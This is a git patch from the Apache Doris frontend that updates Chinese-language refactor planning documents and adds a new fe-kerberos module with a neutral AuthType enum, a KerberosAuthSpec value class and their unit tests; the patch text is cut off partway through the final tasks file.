22 insertions(+), 13 deletions(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index d55e70c26eaa01..91280518caf4aa 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,7 +7,7 @@ --- -**更新时间**:2026-06-18(实现 session:**FU-T02 + FU-T03 完成** — fe-filesystem 对象存储补齐,**R-008 + R-006 闭环**;下一步 P1-T06) +**更新时间**:2026-06-18(实现 session:**FU-T02 + FU-T03 完成**,R-008 + R-006 闭环;**用户定 D-012:跳过/推迟 P1-T06 docker,直接进 P2 metastore SPI**,下一步 = **P2-T01**) **更新人**:Claude(Opus 4.8) ## 这次 session 完成了什么(FU-T02 + FU-T03) @@ -43,19 +43,22 @@
    ## 当前状态 -- 阶段:Research ✅ / Design ✅(**11 决策 D-001..D-011**)/ **Implement 🚧(P1 5/6 + FU-T01/T02/T03 ✅,仅剩 P1-T06 验证)**。 -- 任务计数 **8/14**(P0: 2/2 ✅ | P1: 5/6 | P2: 0/5 | P3a: 0/1)| follow-up **FU-T01 ✅ + FU-T02 ✅ + FU-T03 ✅**(均已完成)| P3b 占位。 -- **R-006 / R-007 / R-008 全部已闭环**。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键 + OSS/COS/OBS 无凭据补 `ANONYMOUS` + 调优默认有 UT 守护。 -- ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + mutation 证)。 +- 阶段:Research ✅ / Design ✅(**12 决策 D-001..D-012**)/ **Implement 🚧(P1 storage 5/6,P1-T06 docker 推迟[D-012];进入 P2 metastore SPI)**。 +- 任务计数 **8/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟**[非取消,docker 验证折进 P2-T05 一次跑]| P2: 0/5 | P3a: 0/1)| follow-up **FU-T01 ✅ + FU-T02 ✅ + FU-T03 ✅**| P3b 占位。 +- **R-006 / R-007 / R-008 全部已闭环**(UT/mutation 层面)。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键 + OSS/COS/OBS 无凭据补 `ANONYMOUS` + 调优默认有 UT 守护。 +- ⚠️ **e2e/docker 全程未跑**(P1 收口 storage 等价的真闸 + P2 metastore T2/5-flavor 闸 一并留到 P2-T05 docker 跑;D-012)。 -## 下一步(明确):P1-T06(P1 验证收口) -> **R-006/R-007/R-008 已全闭环** → P1-T06 应为**干净全绿验收**(不带已知漂移)。 +## 下一步(明确):P2-T01(新建 fe-connector-metastore-api) +> **用户定 D-012:跳过/推迟 P1-T06 docker,直接进 P2**(docker 验证集中到 P2-T05 一次跑:届时同时覆盖 P1 storage 等价 T1 + P2 metastore T2 + 5 flavor + vended + kerberos)。 > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** -**P1-T06(P1 验证收口)**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。 -- **HDFS-warehouse flavor(含 HA / kerberized)应通过**(R-007 闭环验证点,FU-T01);**无凭据 OSS/COS/OBS 应通过**(R-008 闭环,FU-T02);**调优默认**由 FU-T03 UT 守护(R-006)→ 干净全绿。 -- **现场 recon 必做**:确认 docker paimon 测试套件入口(`enablePaimonTest=true` 如何起、5 flavor 的 regression-conf)+ 当前分支 jar 打包要点(paimon 模块需 `-am package -Dassembly.skipAssembly=true`,shade jar 携带 HiveConf)。**不部署 docker 则明确标「未跑 e2e」**(CLAUDE.md Rule 12),不得把「编译过」当「验证过」。 -- 之后 P2(metastore SPI:P2-T01 新建 fe-connector-metastore-api …)+ P3a(fe-kerberos 叶子)。 +**P2-T01(新建 `fe-connector-metastore-api`)**:新模块(依赖 fe-foundation + fe-filesystem-api)= `MetaStoreProperties` 接口(`String providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()`,**无 per-backend 枚举**,D-006)+ 子接口 HMS/DLF/REST/JDBC/FileSystem(中立 Map/标量,**不暴露** HiveConf/SDK 类型)。**不实现** Glue/S3Tables(留扩展)。新模块声明进 `fe-connector/pom.xml`。 +- **现场 recon 必做**(顶部流程 step 2): + 1. 读设计 §3.1(接口签名权威来源)+ **D-006**(确认无 `MetaStoreType` 枚举、用 provider+能力方法)+ **D-004**(@ConnectorProperty 绑定)。 + 2. 对照真实代码:fe-core `datasource/property/metastore/**`(旧 `MetastoreProperties` + `Paimon*MetaStoreProperties` 的接口面/Type/能力)+ paimon 现 `PaimonCatalogFactory`(手抄 HMS/DLF 逻辑,P2-T02/T03 上移的来源)+ `FileSystemProvider`/`FileSystemPluginManager`(D-006 镜像样板)。 + 3. 核对依赖图红线:metastore-api 只可依赖 `fe-foundation` + `fe-filesystem-api`(+ fe-connector-api/spi);不得 import fe-core/{catalog,common,datasource,...}。 +- **范围张力提示**:P2 是大阶段(2 新模块 + provider SPI + 移植解析逻辑 + P3a fe-kerberos 交织:P3a-T01 依赖 P2-T02 作 facts 消费方)。**P2-T01 仅建 api 接口骨架**(无解析逻辑,纯类型);解析/provider 在 P2-T02。实施前建议 AskUserQuestion 定 P2-T01 的接口边界(子接口集合、能力方法集合)若设计 §3.1 有不确定。 +- **白名单变更**:P2 需把 `fe-connector-metastore-api/**`(+后续 spi)加入 WORKFLOW §4.1 白名单(原已列为「新建」允许路径,见 §4.1);`fe-connector/pom.xml` 新增模块声明(已在白名单)。 ## 未决 / 需注意 - ✅ 已闭环:R-006(FU-T03)、R-007(FU-T01)、R-008(FU-T02)。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 76588aa4658908..84aec848e6c540 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -22,11 +22,11 @@ - **FU-T03(R-006,本次 commit)**:4 个 `*FileSystemPropertiesTest` 各加 1 个调优默认守护测试(BE map + Hadoop map,字面量期望值非常量);S3 50/3000/1000、OSS/COS/OBS 100/10000/10000(已核 legacy parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→ 4 测全红证有效。S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + sibling 绿、checkstyle 0。纯 test-only。 - ⚠️ docker e2e 未跑(两者真闸均在 P1-T06)。 - **FU-T01 ✅(2026-06-17,D-010,commit `a426648f209`)**:`fe-filesystem-hdfs` HDFS typed BE model(**R-007 闭环**)。78/0 + 对抗 review `wf_5db99e32-2ad` 清场。 -- **下一步 = `P1-T06`(P1 验证收口)**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。R-006/R-007/R-008 均已闭环 → P1-T06 应为**干净全绿验收**(HDFS-warehouse 含 HA/kerberized 应通过;无凭据 OSS/COS/OBS 应通过)。不部署 docker 则明确标「未跑 e2e」(Rule 12)。之后 P2(metastore SPI)+ P3a(fe-kerberos 叶子)。 +- **下一步 = `P2-T01`(新建 fe-connector-metastore-api)**(用户 2026-06-18 **D-012:跳过/推迟 P1-T06 docker,直接进 P2**)。**P1-T06 非取消而是推迟**——其 docker 验证与 P2-T05 的 docker 5-flavor 合并为一次跑(同一 `enablePaimonTest=true` 套件)。R-006/R-007/R-008 已在 UT/mutation 层闭环。**P2-T01**:新模块(fe-foundation + fe-filesystem-api 依赖)= `MetaStoreProperties`(`providerName()` + 能力方法,无枚举,D-006)+ HMS/DLF/REST/JDBC/FileSystem 子接口(中立类型)。实施前 recon 设计 §3.1 + D-006/D-004 + fe-core metastore 包 + paimon `PaimonCatalogFactory`。⚠️ docker 全程未跑(留 P2-T05)。 - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 -- ▶ **下一步**:P1-T06(docker 5-flavor 真等价闸 Option C;验 R-006 调优默认 + R-007/R-008 已知回归边界)→ P1 收口 → 后续 P2(metastore SPI)。 +- ▶ **下一步**:**P2-T01**(新建 fe-connector-metastore-api)。**P1-T06 推迟**(D-012,docker 验证折进 P2-T05 一次跑)。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index c641a55ae25959..95d211e2be7cc6 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -5,6 +5,12 @@ --- +## D-012 — 跳过/推迟 P1-T06 docker 验证,直接进入 P2(metastore SPI);docker 验证集中到 P2-T05 +- **日期**:2026-06-18 | **决策者**:用户(「跳过 p1-t06,先开始做下一阶段」) +- **内容**:**不在此刻跑 P1-T06**(P1 storage 收口的 docker 5-flavor 真等价闸);直接开始 **P2(metastore SPI,从 P2-T01 起)**。P1-T06 **非取消而是推迟**——其 docker 验证(T1 storage 等价:S3/OSS/COS/OBS/HDFS + 无凭据 OSS/COS/OBS + 调优默认)与 P2-T05 的 docker 验证(T2 metastore 等价 + 5 flavor + vended + kerberos)**合并为一次 docker 跑**(P2-T05 本就需要同一套 `enablePaimonTest=true` 5-flavor 环境),避免重复部署。 +- **理由**:R-006/R-007/R-008 已在 UT/mutation 层闭环,P1 storage 路径无已知漂移;P1-T06 与 P2-T05 共用同一 docker 套件,分两次跑无收益。用户优先推进架构进度(P2 大阶段),把所有 e2e 验证留到 P2 收口一次性做。 +- **影响**:实施顺序 P1-T06 → 推迟到 P2-T05 之后/合并;PROGRESS/HANDOFF「下一步」改为 P2-T01;**P1-T06 task 状态保持「未完成(推迟)」**(不标 ✅,docker 未跑);CLAUDE.md Rule 12:在 P2-T05 docker 真跑前,所有「完成」均须标「未跑 e2e」。WORKFLOW §4.1 白名单按 P2 需要纳入 `fe-connector-metastore-api/spi`(原已列为新建允许路径)。 + ## D-011 — P1-T06 之前先处理 R-008 + R-006(授权触碰 fe-filesystem-{s3,oss,cos,obs}) - **日期**:2026-06-18 | **决策者**:用户(「在做 p1-t06 之前,把 r-008 和 r-006 先处理掉」) - **内容**:**调整实施顺序** = 先 **FU-T02(R-008)** + **FU-T03(R-006)**,再 **P1-T06**。授权本次**局部解禁**对象存储 typed 模块(原 D-005 / WORKFLOW §4.1 禁碰 fe-filesystem,D-010 仅放行 fe-filesystem-hdfs): From 51df4fccd017f5050588ca281a8557a40c2f8b73 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 05:28:45 +0800 Subject: [PATCH 089/128] [P3a-T01] fe-kerberos: neutral Kerberos facts carrier (AuthType + KerberosAuthSpec) Start P2 (metastore SPI). P2-T01's HmsMetaStoreProperties needs AuthType and KerberosAuthSpec; fe-common's AuthType is off-limits to connectors (import gate) and the design homes these neutral facts in fe-kerberos (D-007). Per user decision (D-013), build fe-kerberos first. This is the dependency-free facts-carrier slice of the new top-level leaf module fe-kerberos: - AuthType (SIMPLE/KERBEROS) with fromString() resolving KERBEROS only for an explicit "kerberos" (case/space-insensitive), else SIMPLE. - KerberosAuthSpec: immutable client principal+keytab value object with hasCredentials() (both must be non-blank); the HMS service principal is intentionally excluded (it is a HiveConf override, not a doAs fact). Zero production dependencies (no Hadoop yet); the hadoop-dependent authenticator machinery is added incrementally when P2-T02 consumes it. Registered in the fe reactor right after fe-foundation. AuthTypeTest 3/0, KerberosAuthSpecTest 3/0; checkstyle 0; BUILD SUCCESS. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-kerberos/pom.xml | 62 +++++++++++++ .../org/apache/doris/kerberos/AuthType.java | 58 +++++++++++++ .../doris/kerberos/KerberosAuthSpec.java | 86 +++++++++++++++++++ .../apache/doris/kerberos/AuthTypeTest.java | 49 +++++++++++ .../doris/kerberos/KerberosAuthSpecTest.java | 56 ++++++++++++ fe/pom.xml | 1 + .../metastore-storage-refactor/WORKFLOW.md | 1 + .../decisions-log.md | 8 ++ plan-doc/metastore-storage-refactor/tasks.md | 3 +- 9 files changed, 323 insertions(+), 1 deletion(-) create mode 100644 fe/fe-kerberos/pom.xml create mode 100644 fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/AuthType.java create mode 100644 fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java create mode 100644 fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/AuthTypeTest.java create mode 100644 fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/KerberosAuthSpecTest.java diff --git a/fe/fe-kerberos/pom.xml b/fe/fe-kerberos/pom.xml new file mode 100644 index 00000000000000..d23c35e84deb82 --- /dev/null +++ b/fe/fe-kerberos/pom.xml @@ -0,0 +1,62 @@ + + + + 4.0.0 + + org.apache.doris + ${revision} + fe + ../pom.xml + + fe-kerberos + jar + Doris FE Kerberos + + Neutral, top-level leaf module for Hadoop Kerberos authentication facts and + machinery shared by fe-common, fe-filesystem-*, and fe-connector-* (D-007). + This initial slice carries only the neutral, dependency-free facts types + (AuthType, KerberosAuthSpec) consumed by the metastore connector API; the + hadoop-dependent authenticator machinery is added incrementally as consumers + land (D-013). + + + + + org.junit.jupiter + junit-jupiter + test + + + + + doris-fe-kerberos + ${project.basedir}/target/ + + + org.apache.maven.plugins + maven-javadoc-plugin + + true + + + + + diff --git a/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/AuthType.java b/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/AuthType.java new file mode 100644 index 00000000000000..cced9b08d85647 --- /dev/null +++ b/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/AuthType.java @@ -0,0 +1,58 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.kerberos; + +/** + * Neutral Hadoop authentication type for external metastore/storage connections. + * + *

    Mirrors the closed {SIMPLE, KERBEROS} set of fe-common + * {@code org.apache.doris.common.security.authentication.AuthType}, but lives in this + * leaf module so connectors (which cannot depend on fe-common) can express the auth + * type as a neutral fact. + */ +public enum AuthType { + SIMPLE("simple"), + KERBEROS("kerberos"); + + private final String desc; + + AuthType(String desc) { + this.desc = desc; + } + + /** Returns the lowercase wire name ("simple" / "kerberos"). */ + public String getDesc() { + return desc; + } + + /** + * Resolves an auth-type string to {@link #KERBEROS} when (and only when) it equals + * {@code "kerberos"} case-insensitively; every other value — including {@code null}, + * blank, {@code "none"} and {@code "simple"} — resolves to {@link #SIMPLE}. + * + *

    This matches the legacy semantics that treat the connection as Kerberos-secured + * solely when the auth type is explicitly {@code kerberos}, and otherwise fall back to + * simple authentication. + */ + public static AuthType fromString(String value) { + if (value != null && KERBEROS.desc.equalsIgnoreCase(value.trim())) { + return KERBEROS; + } + return SIMPLE; + } +} diff --git a/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java b/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java new file mode 100644 index 00000000000000..5705916844446b --- /dev/null +++ b/fe/fe-kerberos/src/main/java/org/apache/doris/kerberos/KerberosAuthSpec.java @@ -0,0 +1,86 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.kerberos; + +import java.util.Objects; + +/** + * Neutral, immutable carrier of the Kerberos login facts (client {@code principal} and + * {@code keytab}) needed to perform a {@code UGI.loginUserFromKeytab(...).doAs(...)}. + * + *

    This is a fact object only — it holds no Hadoop types and performs no login. The + * real authenticated execution is done elsewhere (the FE side, via + * {@code ConnectorContext.executeAuthenticated}). It mirrors the principal/keytab pair of + * fe-common {@code KerberosAuthenticationConfig} but stays dependency-free so connector + * and metastore-api modules can pass it around without pulling fe-common or Hadoop. + * + *

    The HMS service principal (e.g. {@code hive.metastore.kerberos.principal}) is + * deliberately NOT part of this spec: it is a HiveConf override carried via + * {@code HmsMetaStoreProperties.toHiveConfOverrides()}, not a doAs login fact. + */ +public final class KerberosAuthSpec { + + private final String principal; + private final String keytab; + + public KerberosAuthSpec(String principal, String keytab) { + this.principal = principal; + this.keytab = keytab; + } + + /** The Kerberos client principal used for the keytab login. */ + public String getPrincipal() { + return principal; + } + + /** The path to the keytab file used for the principal login. */ + public String getKeytab() { + return keytab; + } + + /** Returns true only when both principal and keytab are non-blank (a usable login pair). */ + public boolean hasCredentials() { + return isNotBlank(principal) && isNotBlank(keytab); + } + + private static boolean isNotBlank(String value) { + return value != null && !value.isBlank(); + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof KerberosAuthSpec)) { + return false; + } + KerberosAuthSpec that = (KerberosAuthSpec) o; + return Objects.equals(principal, that.principal) && Objects.equals(keytab, that.keytab); + } + + @Override + public int hashCode() { + return Objects.hash(principal, keytab); + } + + @Override + public String toString() { + return "KerberosAuthSpec{principal=" + principal + ", keytab=" + keytab + "}"; + } +} diff --git a/fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/AuthTypeTest.java b/fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/AuthTypeTest.java new file mode 100644 index 00000000000000..0a4cd406d97c30 --- /dev/null +++ b/fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/AuthTypeTest.java @@ -0,0 +1,49 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.kerberos; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +class AuthTypeTest { + + @Test + void fromString_resolvesKerberosOnlyForExplicitKerberos() { + // Intent: a connection is treated as Kerberos-secured ONLY when the auth type is + // explicitly "kerberos" (case/whitespace-insensitive); everything else is SIMPLE. + Assertions.assertEquals(AuthType.KERBEROS, AuthType.fromString("kerberos")); + Assertions.assertEquals(AuthType.KERBEROS, AuthType.fromString("KERBEROS")); + Assertions.assertEquals(AuthType.KERBEROS, AuthType.fromString(" Kerberos ")); + } + + @Test + void fromString_resolvesEverythingElseToSimple() { + Assertions.assertEquals(AuthType.SIMPLE, AuthType.fromString(null)); + Assertions.assertEquals(AuthType.SIMPLE, AuthType.fromString("")); + Assertions.assertEquals(AuthType.SIMPLE, AuthType.fromString(" ")); + Assertions.assertEquals(AuthType.SIMPLE, AuthType.fromString("simple")); + Assertions.assertEquals(AuthType.SIMPLE, AuthType.fromString("none")); + Assertions.assertEquals(AuthType.SIMPLE, AuthType.fromString("anything")); + } + + @Test + void getDesc_returnsLowercaseWireName() { + Assertions.assertEquals("simple", AuthType.SIMPLE.getDesc()); + Assertions.assertEquals("kerberos", AuthType.KERBEROS.getDesc()); + } +} diff --git a/fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/KerberosAuthSpecTest.java b/fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/KerberosAuthSpecTest.java new file mode 100644 index 00000000000000..b56502dab93a1c --- /dev/null +++ b/fe/fe-kerberos/src/test/java/org/apache/doris/kerberos/KerberosAuthSpecTest.java @@ -0,0 +1,56 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.kerberos; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +class KerberosAuthSpecTest { + + @Test + void accessorsExposePrincipalAndKeytab() { + KerberosAuthSpec spec = new KerberosAuthSpec("hive/_HOST@REALM", "/etc/security/hive.keytab"); + + Assertions.assertEquals("hive/_HOST@REALM", spec.getPrincipal()); + Assertions.assertEquals("/etc/security/hive.keytab", spec.getKeytab()); + } + + @Test + void hasCredentials_requiresBothPrincipalAndKeytab() { + // Intent: a usable doAs login needs BOTH a principal and a keytab; either missing + // (null or blank) means there is no static Kerberos login to perform. + Assertions.assertTrue(new KerberosAuthSpec("p", "k").hasCredentials()); + Assertions.assertFalse(new KerberosAuthSpec("p", "").hasCredentials()); + Assertions.assertFalse(new KerberosAuthSpec("p", null).hasCredentials()); + Assertions.assertFalse(new KerberosAuthSpec("", "k").hasCredentials()); + Assertions.assertFalse(new KerberosAuthSpec(null, "k").hasCredentials()); + Assertions.assertFalse(new KerberosAuthSpec(" ", " ").hasCredentials()); + Assertions.assertFalse(new KerberosAuthSpec(null, null).hasCredentials()); + } + + @Test + void valueSemantics_equalsAndHashCode() { + KerberosAuthSpec a = new KerberosAuthSpec("p", "k"); + KerberosAuthSpec b = new KerberosAuthSpec("p", "k"); + KerberosAuthSpec c = new KerberosAuthSpec("p", "other"); + + Assertions.assertEquals(a, b); + Assertions.assertEquals(a.hashCode(), b.hashCode()); + Assertions.assertNotEquals(a, c); + } +} diff --git a/fe/pom.xml b/fe/pom.xml index 7cb62d53c31daf..302b29f881ec1e 100644 --- a/fe/pom.xml +++ b/fe/pom.xml @@ -218,6 +218,7 @@ under the License. fe-foundation + fe-kerberos fe-property fe-common fe-catalog diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index d0eb5f84ea0938..1125526a747b3a 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -59,6 +59,7 @@ fe/fe-core/src/main/java/.../fs/FileSystemPluginManager.java (仅新增 fe/fe-core/src/main/java/.../fs/FileSystemFactory.java (仅新增 bindAllStorageProperties;D-009 二次确认) fe/fe-filesystem/fe-filesystem-hdfs/** (FU-T01:HDFS typed BE model;D-010 授权局部解禁) fe/fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/** (FU-T02 R-008 / FU-T03 R-006;D-011 授权;main+test;其它 fe-filesystem 模块[api,spi,azure,broker,local]仍禁碰) +fe/fe-kerberos/** (新建;P3a-T01 fe-kerberos 叶子;D-007/D-013) fe/fe-connector/pom.xml ; fe/pom.xml (仅新增模块声明) plan-doc/metastore-storage-refactor/** (本跟踪目录) ``` diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index 95d211e2be7cc6..c974f7bcc22183 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -5,6 +5,14 @@ --- +## D-013 — Kerberos 中立 facts 类型(AuthType + KerberosAuthSpec)落 fe-kerberos,先于 P2-T01 建;metastore-api 依赖 fe-kerberos +- **日期**:2026-06-18 | **决策者**:用户(AskUserQuestion 选「In fe-kerberos (build it first)」) +- **背景**:P2-T01 的 `HmsMetaStoreProperties` 需要 `AuthType`(SIMPLE/KERBEROS) + `KerberosAuthSpec`(principal/keytab facts)。`AuthType` 现仅在 `fe-common`(连接器 import gate 禁);设计把 `KerberosAuthSpec` 归 `fe-kerberos`(P3a-T01,原排在 P2-T02 之后)→ P2-T01 引用它有构建顺序冲突。 +- **内容**:**遵循 D-007 字面归属** = 这两个中立 facts 类型落 **`fe-kerberos`**;**先建 fe-kerberos 的 facts-carrier 切片**(`AuthType` + `KerberosAuthSpec`,纯 Java、零 hadoop 依赖)于 P2-T01 **之前**;`fe-connector-metastore-api` **依赖 fe-kerberos**(设计 §3.1 header 依赖集 +fe-kerberos)。fe-kerberos 仍是顶层中立叶子(authenticator 机制子集 = hadoop 依赖部分留待 P2-T02 消费时增量补,仍属 P3a-T01 scope)。 +- **被否**:「`KerberosAuthSpec`/`AuthType` 落 metastore-api 自包含」(更简、不改顺序,但偏离 D-007 归属;用户选保持 D-007 单一真相源)。 +- **核实**:现有 `fe-authentication` 模块是**用户登录/角色映射**鉴权(password 插件/Principal/role-mapping),与 hadoop service kerberos **无关**,**不复用**;fe-kerberos 确为新建。 +- **影响**:实施顺序 = **P3a-T01(facts-carrier 切片)→ P2-T01 → P2-T02(补 authenticator 机制 + 消费 facts)**;WORKFLOW §4.1 白名单 +`fe/fe-kerberos/**` + `fe/pom.xml`(新增 `fe-kerberos`,已属「仅新增模块声明」允许);设计 §3.1 header 注「+fe-kerberos」;tasks P3a-T01 标 🚧(facts-carrier 落地,机制待续)。**fe-kerberos facts-carrier 零 hadoop**:`AuthType` enum(SIMPLE/KERBEROS) + `KerberosAuthSpec`(client `principal`+`keytab` 中立标量——doAs 登录事实;HMS service principal 是 HiveConf override 不在此,镜像 fe-common `KerberosAuthenticationConfig` 字段)。 + ## D-012 — 跳过/推迟 P1-T06 docker 验证,直接进入 P2(metastore SPI);docker 验证集中到 P2-T05 - **日期**:2026-06-18 | **决策者**:用户(「跳过 p1-t06,先开始做下一阶段」) - **内容**:**不在此刻跑 P1-T06**(P1 storage 收口的 docker 5-flavor 真等价闸);直接开始 **P2(metastore SPI,从 P2-T01 起)**。P1-T06 **非取消而是推迟**——其 docker 验证(T1 storage 等价:S3/OSS/COS/OBS/HDFS + 无凭据 OSS/COS/OBS + 调优默认)与 P2-T05 的 docker 验证(T2 metastore 等价 + 5 flavor + vended + kerberos)**合并为一次 docker 跑**(P2-T05 本就需要同一套 `enablePaimonTest=true` 5-flavor 环境),避免重复部署。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 26aad1906a3350..f7135b14d5e7d3 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -113,7 +113,8 @@ > **范围说明(用户 2026-06-17 确认)**:拆为 **P3a(paimon-local,✅ 纳入本次)** 与 **P3b(全量去重,follow-up,范围外)**。P3a 纯新增 + 只让 paimon 走新模块,不碰 fe-common/fe-filesystem-hdfs 既有路径 → 符合 D-005;P3b 会改 fe-common + fe-filesystem-hdfs,超出 D-005,与 hive/iceberg 迁移同批,本清单仅占位。 > **归属/命名已定(D-007)**:顶层中立叶子 **`fe-kerberos`**(**非** fe-connector-*,否则破 `fe-filesystem ↛ fe-connector` gate + fe-common 层级倒挂)。 -### P3a-T01 ⬜ 新建 fe-kerberos 叶子模块(仅 paimon 用) +### P3a-T01 🚧 新建 fe-kerberos 叶子模块(仅 paimon 用)— **facts-carrier 切片已落地(2026-06-18,D-013)**,authenticator 机制待续 +- **进度(2026-06-18,facts-carrier 切片,commit 待提交)**:D-013(用户选「fe-kerberos build it first」)——为解 P2-T01 的 `AuthType`/`KerberosAuthSpec` 依赖,**先建 fe-kerberos 的纯 Java 零依赖 facts 切片**:`org.apache.doris.kerberos.AuthType`(SIMPLE/KERBEROS + `fromString`:仅 "kerberos" 命中、余皆 SIMPLE)+ `KerberosAuthSpec`(client principal+keytab 不可变值对象 + `hasCredentials()` 需两者皆非空)。pom(零 prod 依赖 + junit test)+ `fe/pom.xml` 